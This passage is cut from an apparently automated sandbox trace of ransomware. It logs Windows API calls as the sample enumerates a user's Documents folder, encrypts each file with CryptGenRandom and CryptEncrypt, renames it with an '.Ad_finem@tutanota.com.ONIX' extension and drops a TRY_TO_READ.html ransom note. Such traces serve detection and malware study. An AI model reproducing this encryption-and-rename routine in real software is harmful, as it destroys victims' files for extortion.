dwFileAttributes=0x80) returned 1 [0120.697] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4mBFL_7lQ8RvM.doc") returned 59 [0120.697] GetProcessHeap () returned 0x410000 [0120.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0120.697] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4mBFL_7lQ8RvM.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4mBFL_7lQ8RvM.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4mBFL_7lQ8RvM.doc" [0120.697] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4mBFL_7lQ8RvM.doc", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4mBFL_7lQ8RvM.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4mBFL_7lQ8RvM.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.697] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=82177) returned 1 [0120.697] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x14101 [0120.697] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.697] GetProcessHeap () returned 0x410000 [0120.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.697] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.699] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.700] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.703] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.704] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14101) returned 0xf50048 [0120.705] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14101) returned 0xf64158 [0120.705] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.705] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x14101, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x14101, lpOverlapped=0x0) returned 1 [0120.707] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-82177, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.707] WriteFile (in: hFile=0x4a8, lpBuffer=0xf64158*, nNumberOfBytesToWrite=0x14101, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf64158*, lpNumberOfBytesWritten=0x367f44c*=0x14101, lpOverlapped=0x0) returned 1 [0120.709] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x14101, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.709] CloseHandle (hObject=0x4a8) returned 1 [0120.710] GetProcessHeap () returned 0x410000 [0120.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.710] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4mBFL_7lQ8RvM.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d4mbfl_7lq8rvm.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4mBFL_7lQ8RvM.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d4mbfl_7lq8rvm.doc.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.713] GetProcessHeap () returned 0x410000 [0120.713] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.713] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0120.713] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.713] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.713] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x192, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.713] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0120.713] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.714] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.714] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.714] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", dwFileAttributes=0x80) returned 1 [0120.714] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 52 [0120.714] GetProcessHeap () returned 0x410000 [0120.714] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x460008 [0120.714] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" [0120.714] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.714] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=402) returned 1 [0120.714] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x192 [0120.714] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.714] GetProcessHeap () returned 0x410000 [0120.714] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.714] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.716] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.718] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.720] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.722] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x192) returned 0x442938 [0120.722] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x192) returned 0x46a0f0 [0120.722] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.722] ReadFile (in: hFile=0x4a8, lpBuffer=0x442938, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x192, lpOverlapped=0x0) returned 1 [0120.722] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-402, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.722] WriteFile (in: hFile=0x4a8, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x192, lpOverlapped=0x0) returned 1 [0120.723] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x192, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.723] CloseHandle (hObject=0x4a8) returned 1 [0120.724] GetProcessHeap () returned 0x410000 [0120.724] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.724] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.727] GetProcessHeap () returned 0x410000 [0120.728] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.728] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca81d40, ftCreationTime.dwHighDateTime=0x1d5d468, ftLastAccessTime.dwLowDateTime=0x28b7c340, ftLastAccessTime.dwHighDateTime=0x1d5a423, ftLastWriteTime.dwLowDateTime=0x28b7c340, ftLastWriteTime.dwHighDateTime=0x1d5a423, nFileSizeHigh=0x0, nFileSizeLow=0xc822, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fknFVak_q88YIiBgH.docx", cAlternateFileName="FKNFVA~1.DOC")) returned 1 [0120.728] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fknFVak_q88YIiBgH.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fknfvak_q88yiibgh.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.728] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.728] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xc822, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.728] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.728] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.729] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.729] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.729] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.729] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.729] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fknFVak_q88YIiBgH.docx", dwFileAttributes=0x80) returned 1 [0120.729] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fknFVak_q88YIiBgH.docx") returned 63 [0120.729] GetProcessHeap () returned 0x410000 [0120.729] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xee) returned 0x449878 [0120.730] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fknFVak_q88YIiBgH.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fknFVak_q88YIiBgH.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fknFVak_q88YIiBgH.docx" [0120.730] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fknFVak_q88YIiBgH.docx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fknFVak_q88YIiBgH.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fknFVak_q88YIiBgH.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.730] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=51234) returned 1 [0120.730] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xc822 [0120.730] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.730] GetProcessHeap () returned 0x410000 [0120.730] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.730] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.730] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.732] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.733] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.742] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc822) returned 0x4dab68 [0120.742] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc822) returned 0xf50048 [0120.743] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.743] ReadFile (in: hFile=0x4a8, lpBuffer=0x4dab68, nNumberOfBytesToRead=0xc822, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0xc822, lpOverlapped=0x0) returned 1 [0120.744] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-51234, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.744] WriteFile (in: hFile=0x4a8, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0xc822, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0xc822, lpOverlapped=0x0) returned 1 [0120.746] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xc822, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.746] CloseHandle (hObject=0x4a8) returned 1 [0120.747] GetProcessHeap () returned 0x410000 [0120.747] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.747] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fknFVak_q88YIiBgH.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fknfvak_q88yiibgh.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fknFVak_q88YIiBgH.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fknfvak_q88yiibgh.docx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.750] GetProcessHeap () returned 0x410000 [0120.750] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.750] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb98e4780, ftCreationTime.dwHighDateTime=0x1d5d953, ftLastAccessTime.dwLowDateTime=0x3c59c3e0, ftLastAccessTime.dwHighDateTime=0x1d5e7cf, ftLastWriteTime.dwLowDateTime=0x3c59c3e0, ftLastWriteTime.dwHighDateTime=0x1d5e7cf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GxJjeTJES9-KVNlYk", cAlternateFileName="GXJJET~1")) returned 1 [0120.750] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GxJjeTJES9-KVNlYk\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gxjjetjes9-kvnlyk\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0120.752] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3d289b0, ftCreationTime.dwHighDateTime=0x1d58e8a, ftLastAccessTime.dwLowDateTime=0x42942c30, ftLastAccessTime.dwHighDateTime=0x1d56a81, ftLastWriteTime.dwLowDateTime=0x42942c30, ftLastWriteTime.dwHighDateTime=0x1d56a81, nFileSizeHigh=0x0, nFileSizeLow=0x15741, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i6DBGVPdTHC.xlsx", cAlternateFileName="I6DBGV~1.XLS")) returned 1 [0120.752] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\i6DBGVPdTHC.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i6dbgvpdthc.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.752] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.752] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15741, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.752] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.752] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.753] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.753] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.753] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.753] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.753] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\i6DBGVPdTHC.xlsx", dwFileAttributes=0x80) returned 1 [0120.754] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\i6DBGVPdTHC.xlsx") returned 57 [0120.754] GetProcessHeap () returned 0x410000 [0120.754] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0120.754] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\i6DBGVPdTHC.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\i6DBGVPdTHC.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\i6DBGVPdTHC.xlsx" [0120.754] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\i6DBGVPdTHC.xlsx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\i6DBGVPdTHC.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\i6DBGVPdTHC.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.754] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=87873) returned 1 [0120.754] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x15741 [0120.754] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.754] GetProcessHeap () returned 0x410000 [0120.754] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.754] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.755] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.757] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.758] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.759] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15741) returned 0xf50048 [0120.760] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15741) returned 0xf65798 [0120.760] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.760] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x15741, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x15741, lpOverlapped=0x0) returned 1 [0120.763] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-87873, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.763] WriteFile (in: hFile=0x4a8, lpBuffer=0xf65798*, nNumberOfBytesToWrite=0x15741, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf65798*, lpNumberOfBytesWritten=0x367f44c*=0x15741, lpOverlapped=0x0) returned 1 [0120.765] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15741, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.765] CloseHandle (hObject=0x4a8) returned 1 [0120.766] 